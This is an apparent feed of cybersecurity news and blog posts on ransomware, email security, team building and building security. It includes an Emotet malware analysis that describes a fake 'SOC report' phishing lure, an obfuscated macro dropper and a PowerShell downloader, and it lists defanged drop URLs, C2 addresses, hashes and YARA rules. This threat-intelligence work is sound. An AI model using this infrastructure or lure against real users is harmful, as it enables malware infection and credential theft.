The post 1 in 5 SMBs have fallen victim to a ransomware attack appeared first on Help Net Security.

Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy

There’s a clear lack of accountability, especially on the board and among C-suite executives, and a lack of confidence in determining the efficacy of security technologies. AttackIQ and Ponemon Institute surveyed 577 IT and IT security practitioners in the United States who are knowledgeable about their organizations’ IT security strategy, tactics, and technology investments. “Enterprise culture is formed at the top. If enterprise leaders are not actively engaged in ensuring a strong cybersecurity posture, it … More

The post Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy appeared first on Help Net Security.

Top 6 email security best practices to protect against phishing attacks and business email compromise

Most cyberattacks start over email—a user is tricked into opening a malicious attachment, or into clicking a malicious link and divulging credentials, or into responding with confidential data. Attackers dupe victims by using carefully crafted emails to build a false sense of trust and/or urgency. And they use a variety of techniques to do this—spoofing trusted domains or brands, impersonating known users, using previously compromised contacts to launch campaigns and/or using compelling but malicious content in the email. In the context of an organization or business, every user is a target and, if compromised, a conduit for a potential breach that could prove very costly.

Whether it’s sophisticated nation-state attacks, targeted phishing schemes, business email compromise or a ransomware attacks, such attacks are on the rise at an alarming rate and are also increasing in their sophistication. It is therefore imperative that every organization’s security strategy include a robust email security solution.

So, what should IT and security teams be looking for in a solution to protect all their users, from frontline workers to the C-suite? Here are 6 tips to ensure your organization has a strong email security posture:

You need a rich, adaptive protection solution.

As security solutions evolve, bad actors quickly adapt their methodologies to go undetected. Polymorphic attacks designed to evade common protection solutions are becoming increasingly common. Organizations therefore need solutions that focus on zero-day and targeted attacks in addition to known vectors. Purely standards based or known signature and reputation-based checks will not cut it.

Solutions that include rich detonation capabilities for files and URLs are necessary to catch payload-based attacks. Advanced machine learning models that look at the content and headers of emails as well as sending patterns and communication graphs are important to thwart a wide range of attack vectors including payload-less vectors such as business email compromise. Machine learning capabilities are greatly enhanced when the signal source feeding it is broad and rich; so, solutions that boast of a massive security signal base should be preferred. This also allows the solution to learn and adapt to changing attack strategies quickly which is especially important for a rapidly changing threat landscape.

Complexity breeds challenges. An easy-to-configure-and-maintain system reduces the chances of a breach.

Complicated email flows can introduce moving parts that are difficult to sustain. As an example, complex mail-routing flows to enable protections for internal email configurations can cause compliance and security challenges. Products that require unnecessary configuration bypasses to work can also cause security gaps. As an example, configurations that are put in place to guarantee delivery of certain type of emails (eg: simulation emails), are often poorly crafted and exploited by attackers.

Solutions that protect emails (external and internal emails) and offer value without needing complicated configurations or emails flows are a great benefit to organizations. In addition, look for solutions that offer easy ways to bridge the gap between the security teams and the messaging teams. Messaging teams, motivated by the desire to guarantee mail delivery, might create overly permissive bypass rules that impact security. The sooner these issues are caught the better for overall security. Solutions that offer insights to the security teams when this happens can greatly reduce the time taken to rectify such flaws thereby reducing the chances of a costly breach

A breach isn’t an “If”, it’s a “When.” Make sure you have post-delivery detection and remediation.

No solution is 100% effective on the prevention vector because attackers are always changing their techniques. Be skeptical of any claims that suggest otherwise. Taking an ‘assume breach’ mentality will ensure that the focus is not only on prevention, but on efficient detection and response as well. When an attack does go through the defenses it is important for security teams to quickly detect the breach, comprehensively identify any potential impact and effectively remediate the threat.

Solutions that offer playbooks to automatically investigate alerts, analyze the threat, assess the impact, and take (or recommend) actions for remediations are critical for effective and efficient response. In addition, security teams need a rich investigation and hunting experience to easily search the email corpus for specific indicators of compromise or other entities. Ensure that the solution allows security teams to hunt for threats and remove them easily.
Another critical component of effective response is ensuring that security teams have a good strong signal source into what end users are seeing coming through to their inbox. Having an effortless way for end users to report issues that automatically trigger security playbooks is key.

Your users are the target. You need a continuous model for improving user awareness and readiness.

An informed and aware workforce can dramatically reduce the number of occurrences of compromise from email-based attacks. Any protection strategy is incomplete without a focus on improving the level of awareness of end users.

A core component of this strategy is raising user awareness through Phish simulations, training them on things to look out for in suspicious emails to ensure they don’t fall prey to actual attacks. Another, often overlooked, but equally critical, component of this strategy, is ensuring that the everyday applications that end-users use are helping raise their awareness. Capabilities that offer users relevant cues, effortless ways to verify the validity of URLs and making it easy to report suspicious emails within the application — all without compromising productivity — are very important.

Solutions that offer Phish simulation capabilities are key. Look for deep email-client-application integrations that allow users to view the original URL behind any link regardless of any protection being applied. This helps users make informed decisions. In addition, having the ability to offer hints or tips to raise specific user awareness on a given email or site is also important. And, effortless ways to report suspicious emails that in turn trigger automated response workflows are critical as well.

Attackers meet users where they are. So must your security.

While email is the dominant attack vector, attackers and phishing attacks will go where users collaborate and communicate and keep their sensitive information. As forms of sharing, collaboration and communication other than email, have become popular, attacks that target these vectors are increasing as well. For this reason, it is important to ensure that an organization’s anti-Phish strategy not just focus on email.

Ensure that the solution offers targeted protection capabilities for collaboration services that your organization uses. Capabilities like detonation that scan suspicious documents and links when shared are critical to protect users from targeted attacks. The ability in client applications to verify links at time-of-click offers additional protection regardless of how the content is shared with them. Look for solutions that support this capability.

Attackers don’t think in silos. Neither can the defenses.

Attackers target the weakest link in an organization’s defenses. They look for an initial compromise to get in, and once inside will look for a variety of ways increase the scope and impact of the breach. They typically achieve this by trying to compromise other users, moving laterally within the organization, elevating privileges when possible, and the finally reaching a system or data repository of critical value. As they proliferate through the organization, they will touch different endpoints, identities, mailboxes and services.

Reducing the impact of such attacks requires quick detection and response. And that can only be achieved when the defenses across these systems do not act in silos. This is why it is critical to have an integrated view into security solutions. Look for an email security solution that integrates well across other security solutions such as endpoint protection, CASB, identity protection, etc. Look for richness in integration that goes beyond signal integration, but also in terms of detection and response flows.

 

 

The post Top 6 email security best practices to protect against phishing attacks and business email compromise appeared first on Microsoft Security.

How to build a battle-ready cybersecurity team?

Estimated reading time: 3 minutes

Organizations and the people who run them are slowly perceiving cybersecurity to be a slightly different ball game than information security.

As global organizations grapple with cyber threats and aim to keep their enterprises safe from malware, hackers and other forms of threats, their understanding of this domain is getting richer every day.

Cybersecurity management cannot happen in isolation – appointing one security officer to handle everything in cybersecurity is not going to make an organization efficient or secure.

There needs to be a specialized team whose sole task should be to manage the entire paradigm of cybersecurity for a business.

If you are a CEO or a senior leader of an enterprise, reading this and agreeing to this, the next question you should ask is how to create a solid, efficient & battle-ready security team?

The following tips may help:

  1. Look for specialized resources and hire them

A Frost & Sullivan report observed that the global cybersecurity workforce will have more than 1.5 million unfulfilled positions by 2020. This indicates that there will be a substantial hiring gap when it comes to dealing with cybersecurity and enterprises must be aware of that. To build a good team, there cannot be any gaps. If you’re a CISO or even a CEO, go hunting for specialized specific cybersecurity skills in the market and don’t leave any stones unturned till you find them. Make it clear to the organization that this is a hiring gap that needs to be filled at any cost whatsoever. Once the skills are identified, swoop in quickly and hire the personnel as soon as possible, before someone else gets to them.

  1. Assign responsibilities

There are different facets to cybersecurity and if the hiring has been correct, then an enterprise has hired people suited to those facets. But roles need to be assigned properly as well keeping in mind your employee capabilities – ensure that there are enough people looking after essential cybersecurity behaviours like patch updates, firewall protection, endpoint security, insider threats and regular audits. Once people are aware of their roles, it is easier to form a plan and act accordingly.

  1. Conducting regular Red Team Assessments

Think of cybersecurity personnel as virtual firefighters or disaster management specialists – most of their training takes place as simulations in the hope that when that one incident happens in reality, the personnel will be perfectly trained to take the appropriate measures. The same is true for your cybersecurity team. Regular assessments and Red Team Assessments (which are basically mock trials of cyberattacks) must happen regularly to inculcate absolute readiness into your team. This will help make them battle-ready when an inevitable attack takes place.

  1. Keep upskilling

You have assembled a great cybersecurity team with perfect readiness to tackle the next cyberattack. Work is done, right? Not quite. A team tackling cyber threats is only as good as today. Tomorrow’s cyber threats are continuously evolving as criminals constantly innovate in their desperation to hit targets hard. Cybersecurity is that critical function which needs continuous upskilling in the form of training, self-education or anything else. The learning never stops in cybersecurity.

  1. Empower cybersecurity personnel

Security personnel cannot be lame ducks in an enterprise. In such a situation, all their skills and endurance will be wasted giving way to a high-risk factor to the enterprise. These personnel must be empowered by their managers to act and take decisions in a field as dynamic as cyber attack prevention.

To complement a battle-ready security team, Seqrite offers a range of security solutions providing complete enterprise security. The company’s Endpoint Protection was recently awarded as the best in the world by AV-Test and comes preloaded with Data Loss Prevention (DLP) for advanced endpoint and data protection.

The post How to build a battle-ready cybersecurity team? appeared first on Seqrite Blog.

Code dependency mapping’s role in securing enterprise software

Enterprise software is only as good as its security. Today, a data breach costs $3.92 million on average. Organizations are expected to spend $124 billion on security in 2019 and will probably invest even more given the alarming rate at which cyberattacks are growing. Despite these investments, newer and more sophisticated threats are emerging every day, making the security of an enterprise’s software environment challenging – even for the most well-prepared. Fortunately, new innovations have … More

The post Code dependency mapping’s role in securing enterprise software appeared first on Help Net Security.

Microsegmentation for refining safety systems

When the TRITON (aka TRISIS) attack struck three refining sites in the Middle East in November of 2017, it was the first known cyber incident to target safety instrumented systems (SIS), specifically Schneider Electric’s Triconex gear. The consequences of these attacks were plant-wide shutdowns. While such shutdowns are costly, the consequences could have been far worse. Refineries rely on correctly functioning SIS equipment to prevent worker casualties and environmental disasters in the face of both … More

The post Microsegmentation for refining safety systems appeared first on Help Net Security.

When properly managed, shadow IT can benefit your organization

77 percent of IT professionals believe their organizations could earn an edge if company leaders were more collaborative with their businesses to find shadow IT solutions, according to a survey of 1000 US-based IT professionals by Entrust Datacard. As organizations adapt to changing technologies, employees are eager to use productivity solutions that help them function more efficiently — even if these solutions are outside the company’s IT rules and processes. This is the shadow IT … More

The post When properly managed, shadow IT can benefit your organization appeared first on Help Net Security.

How seriously are businesses taking their PKI security?

While most enterprises demonstrate a committed effort towards maintaining a well-rounded PKI setup, they still fall short in several key categories. The post-Black Hat survey report generated by AppViewX indicated that the primary reason for these shortfalls resided in the fact that most certificate- and PKI-processes were bound by silos, manual workflows, and a lack of synergy between systems. For instance, nearly 50% of the respondents admitted to still relying on passwords to safeguard private … More

The post How seriously are businesses taking their PKI security? appeared first on Help Net Security.

What is the Future of Cybersecurity?

We all know of the exponential growth of cybercrimes. The question now is, how do we stay ahead of a possible data breach? Some experts in the commercial real estate have their say on what’s in store for cybersecurity.

We’ve heard of the recent Capital One hacking. A person was able to access its 100 million credit card applications and customer accounts single handedly. Various real estate executives started scrutinizing their systems and data to determine how safe they are against cyber intrusions. By 2021, cybercrime damages can reach trillions around the world, so businesses need to be on top of the situation.

The acceleration of building processes and functions automation also increased the need for cybersecurity. The continuous takeover of the Internet of Things also pushed more information to the cloud. However, machine learning and artificial intelligence have become more efficient, thus decreasing the potential of human error. Consequently, they also increased the possibility of cyber threats. Since building technology changes each day, what then happens to cybersecurity?

Cybersecurity isn’t only a concern for computers and smartphones; but, of the entire infrastructure. The commercial real estate industry often overlooks the security of their physical assets and focuses on the interconnected devices of their employees only. Building cyber invasions have been occurring rampantly, and many operators and owners only decide to spend money on cybersecurity when hackers wreak havoc on their business.

A hacker can change the security systems, open or lock some doors, or shut down the electricity. Building owners prioritize cybersecurity when it’s too late. In the 2019 Cost of a Data Breach Report by IBM, it reported that it takes about 279 days to determine and control a breach. On the other hand, the lifecycle of a cyber-attack takes around 314 days.

Today, hackers perform sophisticated attacks and not only infiltrate technology and machines. Phishing schemes are after high-level deal makers and executives. A cybercriminal may write to a manager to inform him that they haven’t received the payment for a transaction he closed recently. Organizations may not be liable in this example, but the scenario is a poor reflection on them. They may have future problems handling transactions.

In the recent Commercial Real Estate Outlook released by Deloitte, it found out that the top three effects of cybersecurity breaches are:

  • damage to reputation
  • financial fraud and theft
  • identity theft.

What’s missing?

According to experts, the only way to reduce the cyber-attack risks on businesses and assets is to invest in an appropriate cybersecurity program. IBM estimated the total cost of a data breach to about $3.9 million. Forming an incident response team and using encryption can lessen the impact of a massive hack by about $360,000.

The success of a cybersecurity program relies on having a sustainable plan to address specific risks to the organization. Although real estate companies aren’t in the business of cybersecurity, they still must determine the risks, limitations, and budgets in countering any cyber-attacks. 

In a Deloitte survey, respondents reported the top three challenges of cybersecurity management:

  • rising complexities and accelerated IT changes
  • lack of administration detailed response
  • ineffective security fixes due to interoperability and functionality issues

Extensive prevention programs don’t need to be complicated. Executives must see cybersecurity as a timeline and not as a simple one-time incident.

Conventional IT organizations always assess different industries, but no one talks about the operational technology of buildings and their risks. Moreover, operators and owners must be proactive instead of reactive in their efforts to prepare against cyber-attacks, so cybersecurity standards must conform to the continually evolving building technology. Therefore, board members and leaders must be in the loop to create a close alignment with the business strategy. Also, they need to conduct cyber risk assessments and scenario planning and ensure employee awareness of their responsibilities. Everyone must practice vigilance.

The significance of cybersecurity will continue to evolve as a threat, and business scenarios continue to become more complex. Moreover, regulatory oversight and functions can take a more active role and must cut across geographies.

The Cybersecurity Outlook

The compelling question is, “who should be the most responsible for the cybersecurity of a real estate company?” Other people articulate that the data property owners collect from their tenants is an enormous issue because the protection of sensitive information and system data must be paramount. The staff of building management must be accountable for any specific events that can occur. On the other hand, some experts point to the IT department as the primary group that must put in place a robust cybersecurity program together with its IT infrastructure.

Building owners and operators must be aware of the risks and understand that the involvement of all functions and departments must be present in preventing or mitigating these risks of cyber-attacks.

The aptest answer lies in the middle. Many experts believe that building operators and owners must discuss with outside vendors and their internal IT providers for every property they have. They must draft a plan to protect the physical assets and the network. The solution lies when the puzzle pieces fit together. It may be the integration of a technology system into real estate or vice versa.

Excellent cyber hygiene begins with data governance. In a building organization, cybersecurity isn’t an IT issue, but a risk mitigation issue. Each individual and department has a significant role to play in thwarting any cybersecurity attacks.

Final Remarks

Cybersecurity is an issue that concerns everyone in the commercial real estate industry. Hackers and cybercriminals perform coordinated and sophisticated attacks to ruin the most secured IT infrastructure. Therefore, organizations must take brave steps to counter them. They lose more money if they aren’t earnest in protecting their infrastructure and physical assets. This predicament isn’t the only issue that they must overcome. They also lose credibility, and their reputation suffers when they become victims of malicious and fraudulent attacks. Therefore, the significance of instituting a robust cybersecurity program is now a requirement and not just a whim.

The post What is the Future of Cybersecurity? appeared first on .

Report to Your Management with the Definitive ‘Incident Response for Management’ Presentation Template

Security incidents occur. It's not a matter of 'if' but of 'when.' There are security products and procedures that were implemented to optimize the IR process, so from the 'security-professional' angle, things are taken care of. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process with their management a much more

“Smart city” governments should also be smart about security

While the definition of “smart city” is still under debate, one thing is indisputable: the technologies used to make smart cities a reality are currently acquired and deployed after very little (or even no) security testing. Cesar Cerrudo, CTO at IOActive and board member of the Securing Smart Cities initiative, says that city governments – the buyers of these technologies – often blindly trust vendors when they say that their products are secure. They ask … More

The post “Smart city” governments should also be smart about security appeared first on Help Net Security.

Viewing cybersecurity incidents as normal accidents

As we continue on through National Cybersecurity Awareness Month (NCSAM), a time to focus on how cybersecurity is a shared responsibility that affects all Americans, one of the themes that I’ve been pondering is that of personal accountability. Years ago, I read Charles Perrow’s book, “Normal Accidents: Living with High-Risk Technologies,” which analyzes the social side of technological risk. When the book was first written in 1984, Perrow analyzed complex systems like nuclear power, aviation … More

The post Viewing cybersecurity incidents as normal accidents appeared first on Help Net Security.

Most expect the risk of privileged user abuse to increase

Insufficient privileged access management (PAM) practices continue to be a critical challenge for many organizations despite significant risks of data breaches and security incidents, according to Sila and Ponemon Institute. According to more than 650 North American respondents, 70 percent think it likely that privileged users within their organizations are accessing sensitive or confidential data for no discernible business need and more than half expect privilege user abuse to increase in next 12-24 months. Interestingly, … More

The post Most expect the risk of privileged user abuse to increase appeared first on Help Net Security.

Is Emotet gang targeting companies with external SOC?

Introduction

The group behind Emotet malware is getting smarter and smarter in the way the deliver such a Malware. While the infection schema looks alike from years; the way the group tries to infect victims improves from day to day.
Today I’d like to share a quick analysis resulted by a very interesting email which claimed to deliver a SOC “weekly report” on the victim email. First of all the attacker knew the target organization was protected by a SOC (Security Operation Center) so she sent a well crafted email claiming to deliver a Microsoft document wrapping out the weekly SOC report as a normal activity in order to induce the victim to open-it.

SOC report 10 12 2019.doc ( 6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 ) is the delivered file sent on Oct 11, 2019, 11:06:09 PM from grecia@ambientehomedecor.com. I believe that ambientehomedecor.com is not a malicious domain but mostly a new compromised one.

Technical Analysis

Hash6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7
ThreatWord document Dropper (Emotet)
Brief DescriptionFirst stage of Emotet campaign targeting organization with Security Operation Centers
Ssdeep6144:tkPNPASKUzSRnLx3Q4td9pB8LGme764XNNHBly:tkPNPAfUGRt3b3B8LGL6CNJ

Following the original eMail headers from grecia@ambientehomedecor.com to victim’s email box it is possible to figure-out the attacker used a SMPT client who left trace about the original sender IP address which happens to be: 81.48.36.59. According to IPLocation that address is related to a very nice town in northern France: Thury-Harcourt, France.

Thury-Harcourt, France. Sender IP

The attached document is a well obfuscated Microsoft Word document which asks to enable macros in order to view its content. The autoopen function begins a complex obfuscated chain which tries to deter analyst by introducing junk code, junk variable assignments and fake apparent real comments. The following image proves the adopted obfuscation technique. The function c878cxx90590 is the “Real Code” by meaning is not part of junk code but actually is the function who really performs malicious actions. As you might see being in the middle of hundreds similar lines of code it gets hard to spot.

Obfuscated Macro

The obfuscated macro creates on-memory objects and runs them without passing through temporary files. The following image shows the auto-run created object before the Drop’n Execute. The analysed variable in the following image is the c0639047895c6 which, in that specific run, holds the Win32_ProcessStartup created Object for fulfill persistence on the victim machine.

Object Building

Once the dropper assured the persistence and to run during the start-up, it carves from itself the following powershell script. The script runs an encoded string hiding the dropping ULRs. The base64 decoded string shows a romantic foreach statement looping through a list of compromised websites hosting the real payload : de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (VT 6/69). It finally saves the dropped file in a userprofile location as placed in the variable xc0x57b38b2x7, before running it. The following image shows the powershell script before and after the encoding by giving a quick description on it.

Final Deobfuscated Dropper

According to VT, the final run looks like Emotet, a banking trojan who steals credentials, cookies and eCoin wallets. Emotet is also able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, and to send back to command and control found victim information. But let’s try to quickly check it.

Analysis of dropped and executed file (emotet)

Hashde6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216
ThreatEmotet. Data Exfiltration
Brief DescriptionDropped and Executed by previous stage
Ssdeep3072:2xUIvfl2nnKJFddS2TZGjRurmOEfRtaG/70Jfm4JuLYwO9/+Tl:2lvfUnKJFddhAjYrmOEpzcflQu1+

The dropped file (VT 12/69), grabbed from the dropping URLs inside the previous powershell script, is an executable packed by internal functions which uses several techniques to avoid static and dynamic analysis. For example it deletes the original file once executed, it resolves an unusual very high number of APIs and it dynamically resolves functions avoiding static analysis.

Emotet Depacked

During the running phase the analyzed sample records many information on the hosting machine, it asks for local public IP address by querying an external resource: http[://185[.42[.221[.78:443/whoami.php and finally it pushes out those information to external Command and Control (please refer to IoC section for the complete C2 list).

Recorded Information

The sample starts a local service called khmerdefine and assures its persistence by adding that file in c:\Windows\SysWOW64 and setting up a system service in autorun. AV and plenty static traffic signatures confirm we are facing a new encrypted version of Emotet trojan.

Conclusion

Emotet gang is getting smarter and smarter in delivery artifacts. That time they addressed companies having an external Security Operation Center (SOC) pretending to simulate an external SOC operator who sends periodic reports to the company. The delivery content was a Microsoft word document within heavily obfuscated Macros who eventually drops and executes Emotet Malware. The following image represent the compiled MITRE ATT&CK matrix in order to qualify stages and to describe the overall behavior.

MITRE ATT&CK

IoC

email:
grecia@ambientehomedecor.com

Hash:
6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 (.doc)
de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (.exe)

Drop URLs:
http[://xsnonline[.us/blogs/4x466v/
http[://obbydeemusic[.com/aqoeivj4fd/us5htvn/
http[://veeplan[.com/wp-content/dW0o3RoJNG/
http[://wwwkmacobd[.com/u9r/
http[://aijdjy[.com/dup-installer/t0/

C2 (Emotet):
http[://186[.75[.241[.230/cone/loadan/splash/merge/
http[://186[.75[.241[.230/results/json/
http[://186[.75[.241[.230/balloon/json/
http[://186[.75[.241[.230/enable/arizona/splash/merge/
http[://186[.75[.241[.230/acquire/
http[://181[.143[.194.[138:443/health/splash/sess/merge/
http[://85[.104[.59[.244:20/enable/rtm/sess/merge/

Yara Rules

rule EMOTET_SOC_EXE {
   meta:
      date = "2019-10-13"
      hash1 = "de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216"
   strings:
      $x1 = "c:\\Users\\User\\Desktop\\2003\\Efential\\Release\\EFENTIAL.pdb" fullword ascii
      $s2 = "EFENTIAL.exe" fullword ascii
      $s3 = "ZNtlsIkbp2bxIIBXLbRtd3e85g7mJ73gSFPnybocDj/xsKVPWxzllXY/FdB150/ewzkkdzDw5VMbiVfS/SPd0FlXp+VqpDpPDXxNH3cc9TXXa53EGeMfGnsPa3chxKVv" ascii
      $s4 = "tblJgbnpgZmZCaHxmfEpoaS9Cb31DfHpZfVJobW5SYG56YGZmQmh8ZnxKaGkvQm99Q3x6WX1SaG1uUmBuemBmZkJofGZ8SmhpL0JvfUN8ell9UmhtblJgbnpgZmZCaHx" ascii /* base64 encoded string 'nR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|' */
      $s5 = "C9813Hcfx1BkY3VrYVwfB4tWs+/Eb93UVwdvrbdywicNqMdPSiMzJFXbZbSLG6cDA/O9Vy2ob3d3PeVLcie95EpT50oKkSE/8bynT1sLOWCoPxXUd+dPO6BKhHcwzOdT" ascii
      $s6 = "G+MfTPu8J3chkKdvVwmN7R/fNdx3H8cxWUFva2FcHweLIPfrnG/d1FcHb/FxEOQnDajHT0qu26c122W0ixunZpkE2lctqG93dy4Z7jMnveRKU+dp33WJP/G8p09bPG/N" ascii
      $s7 = "RSVloG9h6HM56NP1tCMFZKs69gEEW+JoiOCz9U3uI3uYsb+mL2+97Wf903wpFDCKiBjjtt/TznbwXOcnHS87rh7rG4N2wHiRqPj2AReKM+CICO5NSlNOxut2wHOnb5dY" ascii
      $s8 = "iOC7W7cnZWhtQTw5nu3bSa/eHxvVFB3RfZP9CFkKs3KWazNkXJPk+HTPmTvpWFcnpLn2DUFtp2v1ELP9acqRoKOXIXMJCNtYpiEdTEP7nzdBU8UoA538OfhEk+kUzQrb" ascii
      $s9 = "6RzgkjSOWDNk6FtXIb1gBQ0oTx93sMelCVJYrG9ZEJB07FiwoYhZkKiSkNh3DQweyOCz9UXEmKjkHOXYfeRY2qT4p4UUBtCIA0+o00Fj/JSM4I+AkgRrpYTr7rS9V9wV" ascii
      $s10 = "StOEJiPbZbiKG6dLTcWrVy28bnd3MRHI6Se9+EtT5xnfnbI/8aimT1vHvvS1PxXYdudP5QazN3cw+OZTG6WMoPkj3ehaV6ftpUvyTw1ETh9335+9tGudzBrjH0t/zLV3" ascii
      $s11 = "mQOhiAgYsPyI4DhFgdYtLdGQ1W9Bxmd6m3lnTJcfr4gYGLD8iOA41oOuIaXdCNnnTaphWJ1HYWqR+qqIKBiwmIjgOPiFFCgT1NbQLUTYb0KTUW+UkPeoybBtiGSwewAX" ascii
      $s12 = "Jd812HQfx5Qv5tVrYSAcB4t1CVi1b93QVAdvpSmDyCcNpMRPSpcCbzzbZbCIG6fu/FMSVy20bHd3ShSspye94ElT56m+fUo/8bCkT1t+Me1nPxXQdOdPGL1DQHcw8ORT" ascii
      $s13 = "f64odyFEoG9XrrnC4d81EHAfx9MLlPdrYegYB4s9h95Cb91oUAdvuYg3nCcNHMBPSk5z9mnbZfiNG6fklZhYVy38aXd3FwtmSie9uExT54d2bFE/8eihT1swM44GPxWY" ascii
      $s14 = "G5WtAP8+00dbvQhs6PgZzXSo8WjM1YD2S2wk9prpUJn8oG0I4laYrNKGZTi4kPTVMKbGcImVZllhx5Tj+amkWDhXp2+bKhvFcO9Gasz1gDixo1+XH24Fpyq/01X5aw0b" ascii
      $s15 = "3ie9qEhT593fXyw/8filT1s1hgetPxWodedPR5foK3cwiOVTG/Eyi+Yj3ZhZV6cVyoNtTw00TR93mxbYI2udnBnjHxLYp+x3IZylb1e4qIYS3zXYdR/HAZflQmthIB0H" ascii
      $s16 = "RpFqNpYQapubxqPNu6yDXrsXC6qB7CzF0GzVj0FjbT6RdW15ncWnY7/vh92xHgE5j7MjB9mZ3mVK5FiwlKhYoKj4kIq4A4DduIQLc4bcLK/RsNUFQeBu9pLlbsmemKY/" ascii
      $s17 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s18 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s19 = "iBunjDe9gVct7Gx3d65SQF8nvahJU+cRqKveP/H4pE9bLL3YAz8VqHTnT7v1JHR3MIjkUxv0uwvjI92YWFenoW2yzU8NNEwfd/JCOHlrnZwY4x9adVfbdyGcpG9X8DDB" ascii
      $s20 = "pKjTapsqZ36hVbhZOPU4sD5ekeEYE2WaixuncUK41ZSfp87TA/3tI91r1DvwoBcDoQywknwbTexd6FjAV+2Ac8gY7SPda9RPwKByrBsJvAE05AhPsWyl0KilUwtkCFjk" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 800KB and
      ( pe.imphash() == "ffcd1ab4ae5e052202d6af1ea2767498" or ( 1 of ($x*) or 4 of them ) )
}

rule EMOTET_SOC_PE {
   meta:
      date = "2019-10-13"
      hash1 = "6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7"
   strings:
      $x1 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
      $x2 = "Customer50041 Keeling Bypass, North Christellefort, Tunisia Global128 Manuel Stravenue, New Nicholasfort, Montserrat" fullword ascii
      $x3 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $x4 = "Forward297 German Trail, West Miloshire, Germany Product44796 Chesley Bypass, East Santos, Antigua and Barbudan" fullword ascii
      $x5 = "Regional1198 Rahsaan Motorway, Klockoburgh, Czech Republic Human326 Olson Bypass, North Nicholaus, Zimbabwe" fullword ascii
      $x6 = "Dynamic6743 Hickle Bypass, West Karliborough, United States Minor Outlying Islands Product6344 Zieme Inlet, Gloverfurt, Taiwan" fullword ascii
      $x7 = "*\\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd#Microsoft Forms" wide
      $s8 = "Central080 Ari Ranch, Port Sarinachester, Saint Vincent and the Grenadines Product4773 Cornelius Ford, Maybelleville, Morocco" fullword ascii
      $s9 = "Senior75970 Kiehn Brook, Port Joaquin, Comoros Forward6656 Parker Extension, Halvorsonton, Zambia" fullword ascii
      $s10 = "6868686868686868686868" ascii /* reversed goodware string '8686868686868686868686' */ /* hex encoded string 'hhhhhhhhhhh' */
      $s11 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
      $s12 = "Dynamic98251 Karli Mission, Deronhaven, Democratic People's Republic of Korea Chief1365 Hermann Passage, Rickyport, Oman24 " fullword ascii
      $s13 = "Forward0973 Nienow Dam, Walkermouth, Egypt Customer976 MacGyver Mountain, Schoentown, Northern Mariana Islands+ Lo " fullword ascii
      $s14 = "Corporate28089 Etha Bypass, Jastbury, Turkmenistan Dynamic764 Price Cliffs, Welchtown, Algeriaog(1 " fullword ascii
      $s15 = "National4629 Brianne Locks, Port Shadburgh, Bangladesh Forward481 Ashton Course, Lake Judson, Pakistana Pr" fullword ascii
      $s16 = "Forward563 Sasha Mountains, Nitzschestad, Palau Lead58549 Lesch Parkways, Port Archburgh, Burundi" fullword ascii
      $s17 = "Forward00009 Labadie Valley, Lake Othaview, Brunei Darussalam Future796 Fritsch Road, Mertzchester, Montserrat1831 " fullword ascii
      $s18 = "Central9007 Leland Isle, Laurynview, Morocco Product75313 Mueller Harbors, West Nakiafort, Lithuania+ Log( " fullword ascii
      $s19 = "Regional973 Aubrey Squares, South Simoneville, Svalbard & Jan Mayen Islands Dynamic7842 Madilyn Course, O'Harastad, Armenia" fullword ascii
      $s20 = "Lead7617 Nicolas Meadows, West Odell, Saint Pierre and Miquelon Product9412 Stamm Cove, South Katlynnport, Comoros " fullword ascii
   condition:
      uint16(0) == 0xcfd0 and filesize < 900KB and
      1 of ($x*) and 4 of them
}


Analysis reveals the most common causes behind mis-issued SSL/TLS certificates

We should be able to trust public key certificates, but this is the real world: mistakes and “mistakes” happen. Researchers from Indiana University Bloomington have analyzed 379 reported instances of failures in certificate issuance to pinpoint the most common causes as well as systemic issues that contribute to these happening. About public key certificates A public key certificate (aka digital certificate) proves that an individual, entity or a device is the rightful owner and user … More

The post Analysis reveals the most common causes behind mis-issued SSL/TLS certificates appeared first on Help Net Security.

Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF)

Estimated reading time: 2 minutes

A shift to prioritize data security investments through a Data Security Governance Framework (DSGF) was among the top seven security and risk management trends identified by global research & advisory firm Gartner in 2019.

Breaking it down, the report observed that the changing paradigm of security meant that enterprises were required to identify other frameworks for protecting data. The first step involves the understanding of the data generated by asking questions such as:

  • Why was this data created?
  • When was it created?
  • How will it be used?
